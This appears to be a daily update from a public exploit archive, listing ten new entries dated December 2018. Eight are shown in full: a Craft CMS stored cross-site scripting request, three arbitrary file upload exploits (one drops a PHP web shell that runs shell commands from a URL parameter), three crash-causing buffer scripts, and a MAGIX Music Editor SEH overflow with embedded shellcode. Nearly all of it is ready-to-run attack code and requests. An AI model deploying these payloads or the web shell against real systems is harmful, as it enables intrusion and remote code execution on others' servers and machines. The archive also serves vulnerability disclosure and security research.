DB: 2018-12-28

10 changes to exploits/shellcodes

Product Key Explorer 4.0.9 - Denial of Service (PoC)
NetShareWatcher 1.5.8 - Denial of Service (PoC)
ShareAlarmPro 2.1.4 - Denial of Service (PoC)
MAGIX Music Editor 3.1 - Buffer Overflow (SEH)
Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)
Iperius Backup 5.8.1 - Buffer Overflow (SEH)
Craft CMS 3.0.25 - Cross-Site Scripting
WordPress Plugin Audio Record 1.0 - Arbitrary File Upload
bludit Pages Editor 3.0.0 - Arbitrary File Upload
WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload

exploits/php/webapps/46054.txt

@@ -0,0 +1,39 @@
+# Exploit Title: Craft CMS 3.0.25 - Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2018-12-20
+# Exploit Author: Raif Berkay Dincel
+# Contact: www.raifberkaydincel.com
+# More Details [1] : https://www.raifberkaydincel.com/craft-cms-3-0-25-cross-site-scripting-vulnerability.html
+# More Details [2] : https://github.com/rdincel1/Craft-CMS-3.0.25---Cross-Site-Scripting/blob/master/README.md
+# Vendor Homepage: craftcms.com 
+# Vulnerable Software --> [ https://github.com/rdincel1/Craft-CMS-3.0.25---Cross-Site-Scripting/raw/master/Craft-3.0.25.rar ] 
+# Affected Version: [ 3.0.25 ]
+# CVE-ID: CVE-2018-20418
+# Tested on: Kali Linux / Linux Mint / Windows 10
+
+# Vulnerable Parameter Type: POST 
+# Vulnerable Parameter: http://127.0.0.1/admin-panel-path/index.php?p=admin/actions/entries/save-entry
+# Attack Pattern: <script>alert("Raif_Berkay")</script> 
+
+# Description
+
+Allows it to run a Cross-Site Scripting by saving a new title from the console tab.
+
+# Proof of Concepts:
+
+POST /admin-panel-path/index.php?p=admin/actions/entries/save-entry HTTP/1.1
+Host: IP:PORT
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Registered-Asset-Bundles: ,craft\web\assets\quickpost\QuickPostAsset,craft\web\assets\cp\CpAsset,craft\web\assets\d3\D3Asset,craft\web\assets\elementresizedetector\ElementResizeDetectorAsset,craft\web\assets\garnish\GarnishAsset,yii\web\JqueryAsset,craft\web\assets\jquerytouchevents\JqueryTouchEventsAsset,craft\web\assets\velocity\VelocityAsset,craft\web\assets\jqueryui\JqueryUiAsset,craft\web\assets\jquerypayment\JqueryPaymentAsset,craft\web\assets\datepickeri18n\DatepickerI18nAsset,craft\web\assets\picturefill\PicturefillAsset,craft\web\assets\selectize\SelectizeAsset,craft\web\assets\fileupload\FileUploadAsset,craft\web\assets\xregexp\XregexpAsset,craft\web\assets\fabric\FabricAsset,craft\web\assets\prismjs\PrismJsAsset,craft\redactor\assets\field\FieldAsset,craft\redactor\assets\redactor\RedactorAsset,IP:PORT/admin-panel-path/cpresources/699311eb/fullscreen.js,IP:PORT/admin-panel-path/cpresources/5ec6eb0d/video.js,craft\web\assets\matrix\MatrixAsset,craft\web\assets\recententries\RecentEntriesAsset,craft\web\assets\feed\FeedAsset,craft\web\assets\dashboard\DashboardAsset
+X-Registered-Js-Files: ,IP:PORT/admin-panel-path/cpresources/210842f9/d3.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/8c97f5da/element-resize-detector.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/a3075e2f/jquery.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/28095e6a/jquery.mobile-events.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/b288a952/velocity.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/12b5557f/garnish.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/fc2132f7/jquery-ui.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/aeaf06ba/jquery.payment.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/6270e830/datepicker-tr.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/2fad62a8/picturefill.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7bd34f2c/selectize.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/37456356/jquery.fileupload.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/71bf0ba6/xregexp-all.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7f38141/fabric.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7dfc6a65/js/Craft.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/92be564/QuickPostWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/2a8f54e3/prism.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/d443ac9b/redactor.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/d443ac9b/lang/tr.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/PluginBase.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetImageEditor.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetImages.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetFiles.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftEntryLinks.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/RedactorInput.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/RedactorOverrides.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/699311eb/fullscreen.js,IP:PORT/admin-panel-path/cpresources/5ec6eb0d/video.js,IP:PORT/admin-panel-path/cpresources/2fd586d6/MatrixInput.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/5938f19a/RecentEntriesWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/ff3b78b9/FeedWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/86785e72/Dashboard.min.js?v=1545257412
+X-CSRF-Token: 3DfArizwnHjDchbSztLrD2y9nzm5ZkSF2zukx2PZ3i6suVVTRScwwqtvPKqGXYiVZW1POc8cGtXlnjRfrfplCa1kg6nfVMOwm6fPN3BvkYrtM5QsDEV3dYhbSN1lBW6wFSNfiReM9Q3nAb9ut55USDtdUvokmt1DCs4AOm9Y0Ue1Gx1cmGd1Rzy0v3qTP3MsTi9z4tNJEVFdFMBCFtcEgKxH00WYzD8GdZk2aDlHVJHrMHOLTYzf1SzY2dJlO9ifBT0ZJcJNkvQk83bcygPe64lHjeBls_0-qCtA66-Qmz8L79Jw3QRysr5UkIEis6ZWmtAUCg9ufY_XDgrJ4D6xoV1Udw6pKny00KkAaszDUzyVXbrLuzWn063CqwRIDPS6jgr2Hjl8ERbpOinsVzELgiAbO7pxvJM00FTPI_nXFyl9NgusHfufMzqpUncmPLNxgn5yaN4mHz9EgtY7ynU6YQNTQp73e3B1bCfkd3zvZtP-KJgUwqVPbAHQUV5_HwPDxVs02R-_irNvlPeDAHaR6zdETXeKfLycZ70-kJtIqpo=
+Content-Length: 857
+Connection: close
+Cookie: _ga=GA1.2.143638489.1545256652; _gid=GA1.2.362987822.1545256652; 1031b8c41dfff97a311a7ac99863bdc5_identity=3fe8168bce4c48f844d43d3855ef833d47ba56edc78686d732690216a40a7ee6a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_identity%22%3Bi%3A1%3Bs%3A243%3A%22%5B%221%22%2C%22%5B%5C%226wiT39UWdaEONl4iVMf6YZKo0TXsitqlapyaB4s1w9PJxkC3lUIyQsTP12pW0NLCU03hRa_X8SAglzpjlTUJh47RcOcmjgBQE9uO%5C%22%2C%5C%2212a6fb6b-eb72-44c3-b890-6c71b8d2bb88%5C%22%2C%5C%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A64.0%29+Gecko%2F20100101+Firefox%2F64.0%5C%22%5D%22%2C3600%5D%22%3B%7D; 1031b8c41dfff97a311a7ac99863bdc5_username=2365234bf6c8d0bafa98169137b93dc9e6af973d5135b3f0dd94d23d71c923d2a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; CraftSessionId=asetaditigin2tb5uerlivl8h7; CRAFT_CSRF_TOKEN=f4c4ded0838271c4ba50e1e2953119ff3b266d2cedaeba1984823672a14f6e71a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A208%3A%22UpMNICaFkYV9aBp0gRMIdb67eo4FAjxx6iAYJIMM%7Ca6cfc948987f6fa5745a965899bdadc6ed38ce0c9b259fcaaa124e258d3f0f97UpMNICaFkYV9aBp0gRMIdb67eo4FAjxx6iAYJIMM%7C1%7C%242a%2413%245j8bSRoKQZipjtIg6FXWR.kGRR3UfCL.QeMIt2yTRH1.hCNHLQKtq%22%3B%7D; _gat=1
+Cache-Control: no-transform
+
+enabled=1&fieldsLocation=fields1428173416&CRAFT_CSRF_TOKEN=3DfArizwnHjDchbSztLrD2y9nzm5ZkSF2zukx2PZ3i6suVVTRScwwqtvPKqGXYiVZW1POc8cGtXlnjRfrfplCa1kg6nfVMOwm6fPN3BvkYrtM5QsDEV3dYhbSN1lBW6wFSNfiReM9Q3nAb9ut55USDtdUvokmt1DCs4AOm9Y0Ue1Gx1cmGd1Rzy0v3qTP3MsTi9z4tNJEVFdFMBCFtcEgKxH00WYzD8GdZk2aDlHVJHrMHOLTYzf1SzY2dJlO9ifBT0ZJcJNkvQk83bcygPe64lHjeBls_0-qCtA66-Qmz8L79Jw3QRysr5UkIEis6ZWmtAUCg9ufY_XDgrJ4D6xoV1Udw6pKny00KkAaszDUzyVXbrLuzWn063CqwRIDPS6jgr2Hjl8ERbpOinsVzELgiAbO7pxvJM00FTPI_nXFyl9NgusHfufMzqpUncmPLNxgn5yaN4mHz9EgtY7ynU6YQNTQp73e3B1bCfkd3zvZtP-KJgUwqVPbAHQUV5_HwPDxVs02R-_irNvlPeDAHaR6zdETXeKfLycZ70-kJtIqpo%3D&title=%3Cscript%3Ealert("Raif_XSS")%3C%2Fscript%3E&fields1428173416%5BfeaturedImage%5D=&fields1428173416%5BshortDescription%5D=&fields1428173416%5Bheading%5D=&fields1428173416%5Bsubheading%5D=&fields1428173416%5BarticleBody%5D=&sectionId=2&typeId=2

exploits/php/webapps/46055.txt

@@ -0,0 +1,57 @@
+# Exploit Title: WordPress Plugin Audio Record 1.0 - Arbitrary File Upload
+# Date: 2018-12-24
+# Software Link: https://wordpress.org/plugins/audio-record/
+# Exploit Author: Kaimi
+# Website: https://kaimi.io
+# Version: 1.0
+# Category: webapps
+
+# Unrestricted file upload in record upload process allowing arbitrary extension.
+# File: recorder.php
+# Vulnerable code:
+function save_record_callback() {
+
+        foreach(array('audio') as $type) {
+            if (isset($_FILES["${type}-blob"])) {
+
+                $fileName = uniqid() . '_' .$_POST["${type}-filename"] ;
+                $path_array  = wp_upload_dir();
+                $path = str_replace('\\', '/', $path_array['path']);
+                $uploadDirectory = $path . "/$fileName";
+                if (!move_uploaded_file($_FILES["${type}-blob"]["tmp_name"], $uploadDirectory)) {
+                        echo 000;
+                    wp_die("problem moving uploaded file");
+                }
+
+
+# Exploitation example:
+
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: example.com
+Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
+...
+-----------------------------18311719029180117571501079851
+Content-Disposition: form-data; name="audio-filename"
+
+file.php
+-----------------------------18311719029180117571501079851
+Content-Disposition: form-data; name="audio-blob"; filename="blob"
+Content-Type: audio/wav
+
+<?php phpinfo();
+-----------------------------18311719029180117571501079851
+Content-Disposition: form-data; name="action"
+
+save_record
+-----------------------------18311719029180117571501079851
+Content-Disposition: form-data; name="course_id"
+
+undefined
+-----------------------------18311719029180117571501079851
+Content-Disposition: form-data; name="unit_id"
+
+undefined
+-----------------------------18311719029180117571501079851--
+
+# Uploaded file will be located at standard WordPress media upload directory (for ex: /wp-content/uploads/year/month/).
+# If directory listing is disabled - file name can be guessed due to cryptographically insecure nature of uniqid() call.

exploits/php/webapps/46060.txt

@@ -0,0 +1,34 @@
+# Exploit Title: bludit Pages Editor 3.0.0 - Arbitrary File Upload 
+# Date: 2018-10-02
+# Google Dork: N/A
+# Exploit Author: BouSalman
+# Vendor Homepage: https://www.bludit.com/
+# Software Link: N/A
+# Version: 3.0.0
+# Tested on: Ubuntu 18.04
+# CVE : 2018-1000811
+
+POST /admin/ajax/upload-files HTTP/1.1
+Host: 192.168.140.154
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.140.154/admin/new-content
+X-Requested-With: XMLHttpRequest
+Content-Length: 415
+Content-Type: multipart/form-data; boundary=---------------------------26228568510541774541866388118
+Cookie: BLUDIT-KEY=5s634f6up72tmfi050i4okunf9
+Connection: close
+
+-----------------------------26228568510541774541866388118
+Content-Disposition: form-data; name="tokenCSRF"
+
+67987ea926223b28949695d6936191d28d320f20
+-----------------------------26228568510541774541866388118
+Content-Disposition: form-data; name="bluditInputFiles[]"; filename="poc.php"
+Content-Type: image/png
+
+<?php system($_GET["cmd"]);?>
+
+-----------------------------26228568510541774541866388118--

exploits/php/webapps/46061.txt

@@ -0,0 +1,40 @@
+# Exploit Title: WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
+# Date: 2018-12-24
+# Software Link: https://wordpress.org/plugins/baggage-freight/
+# Exploit Author: Kaimi
+# Website: https://kaimi.io
+# Version: 0.1.0
+# Category: webapps
+
+# Unrestricted file upload for unahtorized user in package info upload 
+# process allowing arbitrary extension.
+
+File: upload-package.php
+
+Vulnerable code:
+if($_POST["submit"])
+{
+    if ($_FILES["file"])
+    {
+        $uploadpath = "../wp-content/plugins/baggage_shipping/upload/".time()."_".$_FILES["file"]["name"];
+
+        move_uploaded_file($_FILES["file"]["tmp_name"],$uploadpath);
+
+# Exploitation example:
+
+POST /wp-content/plugins/baggage-freight/upload-package.php HTTP/1.1
+Host: example.com
+Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
+...
+-----------------------------18311719029180117571501079851
+Content-Disposition: form-data; name="submit"
+
+1
+-----------------------------18311719029180117571501079851
+Content-Disposition: form-data; name="file"; filename="file.php"
+Content-Type: audio/wav
+
+<?php phpinfo();
+-----------------------------18311719029180117571501079851--
+
+# Uploaded file will be located at /wp-content/plugins/baggage_shipping/upload/{timestamp}_info.php.

exploits/windows_x86/dos/46057.py

@@ -0,0 +1,46 @@
+# Exploit Title: Product Key Explorer 4.0.9 - Denial of Service (PoC)
+# Date: 2018-12-25
+# Exploit Author: T3jv1l
+# Vendor Homepage: :http://www.nsauditor.com
+# Software: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
+# Contact: https://twitter.com/T3jv1l
+# Version:  Product Key Explorer 4.0.9
+# Tested on: Windows 7 SP1 x86
+
+# Other affected software from the vendor
+# Software: http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
+# Software: http://www.nsauditor.com/downloads/apkf_setup.exe
+# Software: http://www.nsauditor.com/downloads/officeproductkeyfinder_setup.exe
+# Software: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
+# Software: http://www.nsauditor.com/downloads/spotmsn_setup.exe
+# Software: http://www.nsauditor.com/downloads/spotie_setup.exe
+# Software: http://www.nsauditor.com/downloads/spotftp_setup.exe
+# Software: http://www.network-inventory-software.com/downloads/nhsi_setup.exe
+# Software: http://www.nsauditor.com/downloads/nsi_setup.exe
+# Software: http://www.nsauditor.com/downloads/blueauditor_setup.exe
+# Software: http://www.nsauditor.com/downloads/networksleuth_setup.exe
+# Software: http://www.nsauditor.com/downloads/remshutdown_setup.exe
+# Software: http://www.nsauditor.com/downloads/dnss_setup.exe
+
+# PoC:
+# 1.  Download and install the setup file
+# 2.  A file "PoC.txt" will be created
+# 3.  Click Help > Register... in tool bar
+# 4.  Copy the contents of the file (PoC.txt) and paste in the Registration Key/Name field 
+# 5.  Click OK and BOOMMMM !!!! 
+
+#!/usr/bin/python
+
+buffer = "\x41" * 2000
+buffer += "\x42" * 2000
+buffer += "\x43" * 1000
+
+payload = buffer
+try:
+    f=open("PoC.txt","w")
+    print "[+] Creating %s bytes payload..." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86/dos/46062.py

@@ -0,0 +1,31 @@
+# Exploit Title: NetShareWatcher 1.5.8 - Denial of Service (PoC)
+# Date: 2018-12-25
+# Exploit Author: T3jv1l
+# Vendor Homepage: :http://www.nsauditor.com
+# Software: http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
+# Contact: https://twitter.com/T3jv1l
+# Version: NetShareWatcher 1.5.8
+# Tested on: Windows 7 SP1 x86
+# Other software from the vendor affected 
+# Software: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
+
+# PoC:
+# 1.  Download and install the setup file
+# 2.  A file "PoC.txt" will be created
+# 3.  Click Help > Register... in tool bar
+# 4.  Copy the contents of the file (PoV.txt) and paste in the Registration Key/Name field 
+# 5.  Click OK and BOOMMMM !!!! 
+
+#!/usr/bin/python
+
+buffer = "\x41" * 5256
+
+payload = buffer
+try:
+    f=open("PoC.txt","w")
+    print "[+] Creating %s bytes payload..." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86/dos/46063.py

@@ -0,0 +1,29 @@
+# Exploit Title:ShareAlarmPro 2.1.4 - Denial of Service (PoC)
+# Date: 2018-12-25
+# Exploit Author: T3jv1l
+# Vendor Homepage: :http://www.nsauditor.com
+# Software: http://sharealarm.nsauditor.com/downloads/sharealarmpro_setup.exe
+# Contact: https://twitter.com/T3jv1l
+# Version:ShareAlarmPro 2.1.4
+# Tested on: Windows 7 SP1 x86
+
+# PoC:
+# 1.  Download and install the setup file
+# 2.  A file "PoC.txt" will be created
+# 3.  Click Help > Register... in tool bar
+# 4.  Copy the contents of the file (PoV.txt) and paste in the Registration Key/Name field 
+# 5.  Click OK and BOOMMMM !!!! 
+
+#!/usr/bin/python
+
+buffer = "\x41" * 5000
+
+payload = buffer
+try:
+    f=open("PoC.txt","w")
+    print "[+] Creating %s bytes payload..." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86/local/46056.py

@@ -0,0 +1,72 @@
+# Exploit Title: MAGIX Music Editor 3.1 - Buffer Overflow (SEH)
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Date: 2018-12-24
+# Vulnerable Software: MAGIX Music Editor 3.1
+# Vendor Homepage: https://www.magix.com/us/
+# Version: 3.1
+# Software Link: https://www.magix.com/us/music/mp3-deluxe/
+# Music Editor Software is bundled with MP3 Deluxe 19
+# Tested Windows 7 SP1 x86
+
+# PoC
+# 1. run script
+# 2. open music editor 3
+# 3. go to CD > freedb options > FreeDB Proxy Options
+# 4. copy/paste magix.txt contents into Server field
+# 5. select Accept settings
+# 6. pop calc
+
+#!/usr/bin/python
+
+filename="magix.txt"
+
+#lol
+junk = "A"*420
+
+#jump 6
+nseh = "\xeb\x06\xcc\xcc"
+
+#0x10015b08 : pop ecx # pop ecx # ret  | ascii {PAGE_EXECUTE_READ} [dac3x.dll]
+seh = "\x08\x5b\x01\x10"
+
+#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00" -e x86/alpha_mixed -f c
+#Payload size: 447 bytes
+calc = ("\xda\xd4\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
+"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
+"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
+"\x4c\x4b\x58\x4b\x32\x67\x70\x55\x50\x45\x50\x45\x30\x6e\x69"
+"\x6b\x55\x54\x71\x49\x50\x65\x34\x6c\x4b\x72\x70\x70\x30\x6e"
+"\x6b\x76\x32\x46\x6c\x6c\x4b\x43\x62\x65\x44\x4e\x6b\x50\x72"
+"\x64\x68\x66\x6f\x58\x37\x52\x6a\x31\x36\x45\x61\x4b\x4f\x6e"
+"\x4c\x67\x4c\x43\x51\x61\x6c\x75\x52\x34\x6c\x51\x30\x6b\x71"
+"\x7a\x6f\x56\x6d\x45\x51\x78\x47\x7a\x42\x4c\x32\x56\x32\x56"
+"\x37\x6e\x6b\x32\x72\x42\x30\x4e\x6b\x32\x6a\x37\x4c\x6c\x4b"
+"\x72\x6c\x67\x61\x61\x68\x4a\x43\x30\x48\x73\x31\x6b\x61\x66"
+"\x31\x6e\x6b\x43\x69\x57\x50\x46\x61\x5a\x73\x4c\x4b\x51\x59"
+"\x42\x38\x4d\x33\x37\x4a\x30\x49\x6e\x6b\x46\x54\x6c\x4b\x76"
+"\x61\x68\x56\x65\x61\x4b\x4f\x4c\x6c\x5a\x61\x78\x4f\x56\x6d"
+"\x56\x61\x58\x47\x65\x68\x4b\x50\x53\x45\x48\x76\x37\x73\x71"
+"\x6d\x78\x78\x55\x6b\x31\x6d\x44\x64\x64\x35\x59\x74\x72\x78"
+"\x4c\x4b\x31\x48\x66\x44\x36\x61\x6a\x73\x70\x66\x6e\x6b\x74"
+"\x4c\x42\x6b\x6e\x6b\x46\x38\x57\x6c\x36\x61\x38\x53\x6c\x4b"
+"\x64\x44\x6c\x4b\x46\x61\x5a\x70\x6d\x59\x32\x64\x61\x34\x46"
+"\x44\x53\x6b\x61\x4b\x63\x51\x36\x39\x31\x4a\x52\x71\x69\x6f"
+"\x4b\x50\x71\x4f\x61\x4f\x70\x5a\x6e\x6b\x66\x72\x78\x6b\x6c"
+"\x4d\x31\x4d\x31\x7a\x43\x31\x4e\x6d\x4b\x35\x68\x32\x47\x70"
+"\x65\x50\x65\x50\x36\x30\x62\x48\x54\x71\x4c\x4b\x42\x4f\x4f"
+"\x77\x59\x6f\x4e\x35\x4d\x6b\x68\x70\x68\x35\x4d\x72\x52\x76"
+"\x30\x68\x4e\x46\x5a\x35\x4d\x6d\x6f\x6d\x59\x6f\x4a\x75\x35"
+"\x6c\x46\x66\x73\x4c\x75\x5a\x4d\x50\x69\x6b\x79\x70\x51\x65"
+"\x76\x65\x6f\x4b\x33\x77\x74\x53\x31\x62\x70\x6f\x73\x5a\x33"
+"\x30\x76\x33\x39\x6f\x58\x55\x30\x63\x75\x31\x52\x4c\x73\x53"
+"\x36\x4e\x52\x45\x53\x48\x32\x45\x65\x50\x41\x41")
+
+fill = "C"*2000
+
+buffer = junk + nseh + seh + calc + fill
+
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()